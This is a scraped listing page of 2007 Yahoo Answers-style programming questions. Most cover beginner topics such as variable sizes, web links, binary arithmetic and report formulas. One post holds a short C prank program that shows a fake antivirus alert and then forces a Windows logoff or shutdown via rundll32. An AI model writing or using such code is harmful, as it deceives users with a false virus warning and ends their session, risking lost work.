English Deutsch Français Italiano Español Português 繁體中文 Bahasa Indonesia Tiếng Việt ภาษาไทย
All categories

Programming & Design - January 2007

[Selected]: All categories Computers & Internet Programming & Design

2007-01-22 21:41:36 · 4 answers · asked by VIVA 1

is there somebody to explane it with simple word
thanks

2007-01-22 20:30:47 · 4 answers · asked by QUESTION... 1

This maybe related to any programming language I guess, I need your ideas about this. Who is correct? Check the following.

Mr. X says -> Capacity of the variable should be determined carefully. E.g. To capture a person's age, using an integer is a waste of memory. byte would be an ideal size for such purpose.

Mr. Y says -> No, I do not agree. For PC applications, we do not need to care about resource (memory) so much. Integer is always the best choice for a number type, because they are fast when processing. Integer is the size of CPU register (32b or 64b). So I think this is unnecessary.

Note: I should have put this in a programming forum but I feel yahoo answers are much more quick and gets lots of answers. :D

2007-01-22 19:53:59 · 7 answers · asked by slperera 3

I'm back again this time with a code but unable to use it! I have been given this code that should enable me to make a link to another webspace from myspace (am setting up a myspace for a charity I work for) I have been failing for weeks to get it right. This is the code I have
(name of site)
but if I just put www.whateverthesiteis.com between the brackets of name of site it still doesn't work. I know I've asked similar questions a million times but hopefully this will be the last. What do I need to imput into this code to get my link....thank you!

2007-01-22 19:46:01 · 7 answers · asked by student 01 2

This type of error is comming from last few days when i try to connect the server database before i was working fine.

waiting fro ur answers

Thanks & Regards
Sudhakar

2007-01-22 19:38:18 · 3 answers · asked by Anonymous

any one know what command at windows sdk that give information about windows desktop client area (width and height without the bar). or if there is no one know, is anyone know the technic to gather it

2007-01-22 19:13:36 · 1 answers · asked by Centronix 2

2007-01-22 18:11:24 · 12 answers · asked by yasis_ren 1

#include
#include
#include
#include



int main()
{
printf("Press any key to continue...");
while(!kbhit());
MessageBox(0,"This file contains viruses.Do you want to quit execution.","ANTIVIRUS ALERT!!! ",MB_ICONSTOP);

system("rundll32.exe shell32.dll,SHExitWindowsEx 13");
getch();
}

2007-01-22 18:07:55 · 5 answers · asked by sh 1

What are the technical difficulties in making mobile websites (pros & cons)?
What are the common applications for such cellular website?

2007-01-22 17:47:35 · 3 answers · asked by sagar b 2

i'm trying to find the easiet program to make a wonderful school website...Pls help me ASAP!!!

2007-01-22 17:34:50 · 6 answers · asked by rahimi_kazaa 1

Seriously bone up on the mathematics and physics, I know that, but what else? I mean, obviously computer languages...but what languages should I specifically learn? To what level of math? Calculus III? I'm a junior in high school with some great community colleges near by and I attend one of the highest ranked high schools in the nation- I have tons of opportunities. So if it can be taken, I can take it. So what should I start taking? Then what? Thanks for your answer.

2007-01-22 17:33:35 · 5 answers · asked by fslcaptain737 4

2007-01-22 16:42:04 · 1 answers · asked by Anonymous

Hello,I need urgently to know how to play an AVI vedio(or any other video format) in a Visual C++ Win32 project's EXE (or even in a pop-up player that plays the AVI immediatly).As I want to add several short videos in my game that is implemented using Visual Studio 6 with DirectX 9 (June 2006).

2007-01-22 16:05:42 · 1 answers · asked by Sazzy 1

2007-01-22 16:04:23 · 3 answers · asked by Anonymous

How do I find out how to write proper codes for programming in Visual basic? I'm in a flowcharting class on my second day.
He hasn't yet got into programming yet but maybe someone can explain about codes. How am I to find proper codes and how do I know it is the correct code for the program I'm starting? What I've seen so far is quite confusing and looks very complex. I'm wondering if it may be over my head. Is there a book or web site that explains codes for programming?

2007-01-22 14:53:56 · 4 answers · asked by Carl Ray 1

please i need help

2007-01-22 14:53:38 · 17 answers · asked by PinkPearl 2

I want to get a software package to program in VB and create executables. What should I use?

2007-01-22 14:52:52 · 2 answers · asked by Jay S 2

I'm trying to compile Ruby (ruby-lang.org) source code in Xubuntu. What do I do with that GZ source code file?

2007-01-22 14:29:57 · 4 answers · asked by Anonymous

A) 209 (base 10) using division of 2

B) 209 (base 10) using reversed positional notation

-----------------------------------------------------------------------------------

How many decimal numbers can unsigned binary numbers represent with 3 bits ?

2007-01-22 14:28:29 · 2 answers · asked by Anonymous

Logically NAND 1234h with 7856h and give the 16-bit answer in binary.

2007-01-22 14:12:57 · 2 answers · asked by jessica y 1

Using and basic text, not a jpg.

2007-01-22 14:12:02 · 3 answers · asked by David B 2

is there a difference?
I am currently using vb6...and dont want to upgrade..
but it looks like I have no choice!

2007-01-22 13:59:56 · 2 answers · asked by crazycivic66 2

2007-01-22 13:38:24 · 7 answers · asked by deona_chavez 1

i copied and paste this:♥ is there more than this by the way how do you do those object things!

2007-01-22 13:19:15 · 7 answers · asked by Anonymous

How do I code a button so that when a user presses the enter button, the button is clicked? That is to say, that on my form, I have a user name and password text box, along with a login button. I want to be able to hit the enter key, and trigger the events in my button class. Thanks so much in advance!

2007-01-22 12:57:41 · 2 answers · asked by nohscompclub3 1

2007-01-22 12:51:16 · 1 answers · asked by deenaford 1

strReport = "{Country.city} = " & ddl_city.SelectedValue() & ""
When I try to run it it keeps giving me the following error:
Error in formula . '{Country.city} = New York' A number, currency amount, boolean, date, time, date-time, or string is expected here.
I've been searching everywhere and modifying the statement but it still doesn't work. Please help!!! =(
Thanks...

2007-01-22 12:40:41 · 2 answers · asked by Anonymous

fedest.com, questions and answers